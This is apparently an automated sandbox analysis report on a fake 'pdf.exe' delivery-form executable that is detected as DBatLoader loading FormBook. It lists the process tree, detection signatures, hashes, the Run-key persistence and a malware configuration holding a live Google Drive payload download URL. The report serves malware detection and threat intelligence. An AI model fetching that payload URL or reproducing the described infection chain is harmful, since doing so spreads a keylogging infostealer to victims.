Edit tour

Windows Analysis Report
Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe

Overview

General Information

Sample name:	Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
Analysis ID:	1578035
MD5:	72ab2a99902ec6f67b0d4df67820328e
SHA1:	31477040c90aab506547fe4e4450e71b76e9345b
SHA256:	406044ba7e007830321b3669505774b9e282502ac958f0cd723e5106c33c4180
Tags:	exeuser-abuse_ch
Infos:

Detection

DBatLoader, FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected DBatLoader

Yara detected FormBook

AI detected suspicious sample

Allocates many large memory junks

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Drops PE files with a suspicious file extension

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Sample is not signed and drops a device driver

Sample uses process hollowing technique

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Sigma detected: Execution from Suspicious Folder

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Parent in Public Folder Suspicious Process

Writes to foreign memory regions

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a connection to the internet is available

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Creates processes with suspicious names

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Keylogger Generic

Classification

Process Tree

System is w10x64

Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe (PID: 6620 cmdline: "C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe" MD5: 72AB2A99902EC6F67B0D4DF67820328E)

cmd.exe (PID: 6844 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

xnxcxbpC.pif (PID: 6568 cmdline: C:\Users\Public\Libraries\xnxcxbpC.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)

Cpbxcxnx.PIF (PID: 5800 cmdline: "C:\Users\Public\Libraries\Cpbxcxnx.PIF" MD5: 72AB2A99902EC6F67B0D4DF67820328E)

cmd.exe (PID: 5712 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

xnxcxbpC.pif (PID: 964 cmdline: C:\Users\Public\Libraries\xnxcxbpC.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)

Cpbxcxnx.PIF (PID: 4016 cmdline: "C:\Users\Public\Libraries\Cpbxcxnx.PIF" MD5: 72AB2A99902EC6F67B0D4DF67820328E)

cmd.exe (PID: 1088 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

xnxcxbpC.pif (PID: 3640 cmdline: C:\Users\Public\Libraries\xnxcxbpC.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://blog.vincss.net/re016-malware-analysis-modiloader/ https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://isc.sans.edu/diary/Malspam+pushes+ModiLoader+DBatLoader+infection+for+Remcos+RAT/29896 https://kienmanowar.wordpress.com/2024/04/09/quicknote-phishing-email-distributes-warzone-rat-via-dbatloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://drive.google.com/uc?export=download&id=1zAv03MWnWsI6pwgI8Ehjvb5RMX8bYidK"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000C.00000002.2769119926.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000C.00000002.2792693070.000000001CB90000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000003.2127061894.000000007FB00000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000000.00000002.2294905471.000000007FBD0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000012.00000002.2833990663.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.2253685238.0000000002406000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000005.00000002.2690787267.00000000228E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.2659308740.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000012.00000002.2863377435.000000002C280000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Process Memory Space: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe PID: 6620	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Click to see the 5 entries

Unpacked PEs

Source	Rule	Description	Author
18.2.xnxcxbpC.pif.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
5.2.xnxcxbpC.pif.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
5.2.xnxcxbpC.pif.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
18.2.xnxcxbpC.pif.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
12.2.xnxcxbpC.pif.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
12.2.xnxcxbpC.pif.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0.2.Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe.2cd0000.1.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
Click to see the 2 entries

Sigma Signatures

System Summary

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Source: File created

Author: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, ProcessId: 6620, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\xnxcxbpC.pif, CommandLine: C:\Users\Public\Libraries\xnxcxbpC.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\xnxcxbpC.pif, NewProcessName: C:\Users\Public\Libraries\xnxcxbpC.pif, OriginalFileName: C:\Users\Public\Libraries\xnxcxbpC.pif, ParentCommandLine: "C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe", ParentImage: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, ParentProcessId: 6620, ParentProcessName: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, ProcessCommandLine: C:\Users\Public\Libraries\xnxcxbpC.pif, ProcessId: 6568, ProcessName: xnxcxbpC.pif

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, ProcessId: 6620, TargetFilename: C:\Windows \SysWOW64\svchost.exe

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Cpbxcxnx.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, ProcessId: 6620, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Cpbxcxnx

Sigma detected: Parent in Public Folder Suspicious Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Libraries\Cpbxcxnx.PIF" , ParentImage: C:\Users\Public\Libraries\Cpbxcxnx.PIF, ParentProcessId: 5800, ParentProcessName: Cpbxcxnx.PIF, ProcessCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, ProcessId: 5712, ProcessName: cmd.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Cpbxcxnx.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, ProcessId: 6620, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Cpbxcxnx

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\xnxcxbpC.pif, CommandLine: C:\Users\Public\Libraries\xnxcxbpC.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\xnxcxbpC.pif, NewProcessName: C:\Users\Public\Libraries\xnxcxbpC.pif, OriginalFileName: C:\Users\Public\Libraries\xnxcxbpC.pif, ParentCommandLine: "C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe", ParentImage: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, ParentProcessId: 6620, ParentProcessName: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, ProcessCommandLine: C:\Users\Public\Libraries\xnxcxbpC.pif, ProcessId: 6568, ProcessName: xnxcxbpC.pif

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-19T07:57:54.994455+0100	2028371	3	Unknown Traffic	192.168.2.6	49710	172.217.17.46	443	TCP
2024-12-19T07:57:57.808246+0100	2028371	3	Unknown Traffic	192.168.2.6	49712	172.217.17.65	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF

Avira: detection malicious, Label: HEUR/AGEN.1326052

Found malware configuration

Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe

Malware Configuration Extractor: DBatLoader {"Download Url": ["https://drive.google.com/uc?export=download&id=1zAv03MWnWsI6pwgI8Ehjvb5RMX8bYidK"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF

ReversingLabs: Detection: 57%

Multi AV Scanner detection for submitted file

Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	Virustotal: Detection: 54%			Perma Link
Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe	ReversingLabs: Detection: 57%

Yara detected FormBook

Source: Yara match	File source: 18.2.xnxcxbpC.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.xnxcxbpC.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.xnxcxbpC.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.xnxcxbpC.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.xnxcxbpC.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.xnxcxbpC.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.2769119926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2792693070.000000001CB90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2833990663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2690787267.00000000228E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2659308740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2863377435.000000002C280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\Public\Libraries\Cpbxcxnx.PIF

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe

Joe Sandbox ML: detected

Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown	HTTPS traffic detected: 172.217.17.46:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.6:49712 version: TLS 1.2

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B3A000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020AFD000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: xnxcxbpC.pif, 00000005.00000002.2693895580.0000000022BDE000.00000040.00001000.00020000.00000000.sdmp, xnxcxbpC.pif, 00000005.00000003.2498473359.0000000022899000.00000004.00000020.00020000.00000000.sdmp, xnxcxbpC.pif, 00000005.00000003.2495014448.00000000226E6000.00000004.00000020.00020000.00000000.sdmp, xnxcxbpC.pif, 00000005.00000002.2693895580.0000000022A40000.00000040.00001000.00020000.00000000.sdmp, xnxcxbpC.pif, 0000000C.00000003.2688158342.000000001CA49000.00000004.00000020.00020000.00000000.sdmp, xnxcxbpC.pif, 0000000C.00000002.2793157112.000000001CD8E000.00000040.00001000.00020000.00000000.sdmp, xnxcxbpC.pif, 0000000C.00000002.2793157112.000000001CBF0000.00000040.00001000.00020000.00000000.sdmp, xnxcxbpC.pif, 0000000C.00000003.2678845723.000000001C891000.00000004.00000020.00020000.00000000.sdmp, xnxcxbpC.pif, 00000012.00000003.2761966942.000000002C042000.00000004.00000020.00020000.00000000.sdmp, xnxcxbpC.pif, 00000012.00000002.2863454058.000000002C3A0000.00000040.00001000.00020000.00000000.sdmp, xnxcxbpC.pif, 00000012.00000002.2863454058.000000002C53E000.00000040.00001000.00020000.00000000.sdmp, xnxcxbpC.pif, 00000012.00000003.2766996142.000000002C1F9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: xnxcxbpC.pif, xnxcxbpC.pif, 0000000C.00000003.2688158342.000000001CA49000.00000004.00000020.00020000.00000000.sdmp, xnxcxbpC.pif, 0000000C.00000002.2793157112.000000001CD8E000.00000040.00001000.00020000.00000000.sdmp, xnxcxbpC.pif, 0000000C.00000002.2793157112.000000001CBF0000.00000040.00001000.00020000.00000000.sdmp, xnxcxbpC.pif, 0000000C.00000003.2678845723.000000001C891000.00000004.00000020.00020000.00000000.sdmp, xnxcxbpC.pif, 00000012.00000003.2761966942.000000002C042000.00000004.00000020.00020000.00000000.sdmp, xnxcxbpC.pif, 00000012.00000002.2863454058.000000002C3A0000.00000040.00001000.00020000.00000000.sdmp, xnxcxbpC.pif, 00000012.00000002.2863454058.000000002C53E000.00000040.00001000.00020000.00000000.sdmp, xnxcxbpC.pif, 00000012.00000003.2766996142.000000002C1F9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B3A000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234801484.0000000021A41000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234801484.0000000021A12000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2349827499.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020AFD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2349827499.00000000008FE000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462078533.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462078533.00000000008E2000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe

Code function: 0_2_02CD58B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

0_2_02CD58B4

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://drive.google.com/uc?export=download&id=1zAv03MWnWsI6pwgI8Ehjvb5RMX8bYidK

Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe

Code function: 0_2_02CEE2F8 InternetCheckConnectionA,

0_2_02CEE2F8

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49712 -> 172.217.17.65:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49710 -> 172.217.17.46:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1zAv03MWnWsI6pwgI8Ehjvb5RMX8bYidK HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.google.com
Source: global traffic	HTTP traffic detected: GET /download?id=1zAv03MWnWsI6pwgI8Ehjvb5RMX8bYidK&export=download HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.usercontent.google.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1zAv03MWnWsI6pwgI8Ehjvb5RMX8bYidK HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.google.com
Source: global traffic	HTTP traffic detected: GET /download?id=1zAv03MWnWsI6pwgI8Ehjvb5RMX8bYidK&export=download HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.usercontent.google.com

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com

Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2234166624.000000007ED10000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2290087157.0000000021BCB000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2289441536.0000000021A6E000.00000004.00000020.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000003.2233816494.000000007ED73000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2285949262.0000000020B58000.00000004.00001000.00020000.00000000.sdmp, Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, 00000000.00000002.2293929111.000000007F180000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000003.2350954148.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2514409313.0000000021330000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 00000009.00000002.2452077787.0000000020BAD000.00000004.00001000.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.000000000090F000.00000004.00000020.00020000.00000000.sdmp, Cpbxcxnx.PIF, 0000000D.00000003.2462523876.00000000008B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
